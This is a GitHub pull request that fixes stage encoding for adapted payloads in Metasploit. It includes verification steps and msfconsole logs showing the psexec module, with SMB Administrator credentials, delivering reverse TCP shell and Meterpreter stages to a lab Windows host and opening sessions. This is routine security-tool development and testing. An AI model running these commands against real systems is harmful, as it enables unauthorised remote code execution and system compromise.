Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix adapted payload stage encoding #17721

Merged
merged 2 commits into from
Mar 2, 2023
Merged

Fix adapted payload stage encoding #17721

merged 2 commits into from
Mar 2, 2023

Conversation

zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Mar 1, 2023
edited by bwatters-r7
Loading

This fixes issue #17720 where payloads that were adapted were failing when stage encoding was enabled. This was due to the stage encoding assuming that the stage arch+platform were the same as the payload / stager. The adapters break this assumption by allowing them to be different values.

This update modifies the Stager mixin to use the new stage_arch and stage_platform values for determining compatible encoders. These new attributes default to the payload values but are set to the adapted values by adapted payloads. This ensures that the stage is able to be encoded correctly by properly selecting a compatible encoder. The EncodedPayload class was also updated to allow an explicit Arch and Platform to be specified which is used by the stager to pass the stage information for use instead of the original payloads.

This also updates the Windows shell stage to honor the EnableStageEncoding option by not overriding enable_stage?. Instead the EnableStageEncoding option is set as a default value since it makes sense but this way users can still turn it off if they'd like.

Verification

Start msfconsole and try payloads in staged and unstaged configurations that are both adapted and not adapted.

  • Start msfconsole and use the psexec module. Set all options as appropriate including the RHOST, authentication information and LHOST
  • Try each of the following combinations and see that they all work:
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=true
      • This demonstrates that the original issue was fixed. Without these changes, this would fail. See the output that the stage is encoded with the "Encoded stage with..." message.
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell/reverse_tcp EnableStageEncoding=false
      • This demonstrates that the change to the shell stage allows the EnableStageEncoding option to be set. See in the output that the stage is not encoded.
    • run TARGET=Command PAYLOAD=cmd/windows/powershell/shell_reverse_tcp
      • This demonstrates an unstaged, adapted payload still works.
    • run TARGET=Automatic PAYLOAD=windows/x64/meterpreter/reverse_tcp EnableStageEncoding=true
      • This demonstrates that a staged, non-adapted payload still works with stage encoding.

@smcintyre-r7 smcintyre-r7 linked an issue Mar 1, 2023 that may be closed by this pull request
Adapted payloads fail stage encoding #17720
Closed
@bwatters-r7 bwatters-r7 self-assigned this Mar 2, 2023
@sempervictus
Copy link
Contributor

Excellent! Thank you - this will pay dividends when we upstream w^x stagers as stage encoding needs RWX which doesn't play well there. Should also let me clean up the RC4 x86 hackery - register pressure requires X on the memory region being decrypted whereas x64 handles decryption just fine with RW.

@bwatters-r7
Copy link
Contributor

Old and busted:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.134.159     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                                    s/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (cmd/windows/powershell/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4585             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4202
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[!] StageEncoder failed, falling back to no encoding
[*] Sending encoded stage (0 bytes) to 10.5.134.159
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[*] 10.5.134.159:445 - Getting the command output...
[*] 10.5.134.159:445 - Command finished with no output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful

New and improved:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.134.159     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                                    s/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (cmd/windows/powershell/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4585             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4171
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Sending stage (240 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 1 opened (10.5.135.201:4585 -> 10.5.134.159:64510) at 2023-03-02 13:53:08 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\CpklINstasnMxw.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]

More testing:

msf6 exploit(windows/smb/psexec) > set enablestageencoding true
enablestageencoding => true
msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4191
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 2 opened (10.5.135.201:4585 -> 10.5.134.159:64519) at 2023-03-02 13:54:47 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\fsQssHzy.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>exit
exit

[*] 10.5.134.159 - Command shell session 2 closed.  Reason: User exit

msf6 exploit(windows/smb/psexec) > set enablestageencoding false
enablestageencoding => false
msf6 exploit(windows/smb/psexec) > run

[*] Powershell command length: 4192
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Executing the command...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[*] Sending stage (240 bytes) to 10.5.134.159
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] 10.5.134.159:445 - Checking if the file is unlocked...
[-] 10.5.134.159:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 10.5.134.159:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 10.5.134.159:445 - Getting the command output...
[*] Command shell session 3 opened (10.5.135.201:4585 -> 10.5.134.159:64520) at 2023-03-02 13:55:08 -0600
[-] 10.5.134.159:445 - Unable to read file \Windows\Temp\YrBOXgtKQfxkMa.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 10.5.134.159:445 - Error getting command output
[*] 10.5.134.159:445 - Executing cleanup...
[+] 10.5.134.159:445 - Cleanup was successful


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>exit
exit

[*] 10.5.134.159 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set target Automatic 
target => Automatic
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set enablestageencoding true
enablestageencoding => true

msf6 exploit(windows/smb/psexec) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(windows/smb/psexec) > set lport 4585
lport => 4585
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] 10.5.134.159:445 - Connecting to the server...
[*] 10.5.134.159:445 - Authenticating to 10.5.134.159:445 as user 'Administrator'...
[!] 10.5.134.159:445 - No active DB -- Credential data will not be saved!
[*] 10.5.134.159:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.5.134.159:445 - PowerShell found
[*] 10.5.134.159:445 - Selecting PowerShell target
[*] 10.5.134.159:445 - Powershell command length: 4471
[*] 10.5.134.159:445 - Executing the payload...
[*] 10.5.134.159:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.5.134.159[\svcctl] ...
[*] 10.5.134.159:445 - Obtaining a service manager handle...
[*] 10.5.134.159:445 - Creating the service...
[+] 10.5.134.159:445 - Successfully created the service
[*] 10.5.134.159:445 - Starting the service...
[+] 10.5.134.159:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.134.159:445 - Removing the service...
[+] 10.5.134.159:445 - Successfully removed the service
[*] 10.5.134.159:445 - Closing service handle...
[*] Encoded stage with x64/xor_dynamic
[*] Sending encoded stage (201525 bytes) to 10.5.134.159
[*] Encoded stage with x64/xor_dynamic
[*] Sending encoded stage (201525 bytes) to 10.5.134.159
[*] Meterpreter session 5 opened (10.5.135.201:4585 -> 10.5.134.159:64523) at 2023-03-02 13:56:20 -0600

meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter >

@bwatters-r7 bwatters-r7 added the rn-fix release notes fix label Mar 2, 2023
@bwatters-r7 bwatters-r7 merged commit 5b4962e into rapid7:master Mar 2, 2023
@bwatters-r7
Copy link
Contributor

Release Notes

This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Adapted payloads fail stage encoding
3 participants
@zeroSteiner @sempervictus @bwatters-r7